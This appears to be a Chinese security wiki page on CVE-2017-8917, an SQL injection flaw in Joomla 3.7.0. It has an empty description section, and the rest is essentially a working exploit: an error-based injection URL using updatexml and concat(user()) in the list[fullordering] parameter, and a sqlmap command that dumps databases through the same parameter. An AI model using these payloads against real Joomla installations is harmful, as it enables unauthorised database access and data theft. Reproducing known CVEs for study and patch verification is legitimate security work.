menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right (CVE-2017-8917)Joomla 3.7.0 QL注入漏洞 chevron_right (CVE-2017-8917)Joomla 3.7.0 QL注入漏洞.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    (CVE-2017-8917)Joomla 3.7.0 QL注入漏洞.md
    614 B / 2021-07-15 19:54:55
        (CVE-2017-8917)Joomla 3.7.0 QL注入漏洞
========================================

一、漏洞简介
------------

二、漏洞影响
------------

Joomla 3.7.0

三、复现过程
------------

    http://www.0-sec.org:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)

![1
1.png](./resource/(CVE-2017-8917)Joomla3.7.0QL注入漏洞/media/rId24.png)

### 补充

    sqlmap -u "http://www.0-sec.org/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
    links
    file_download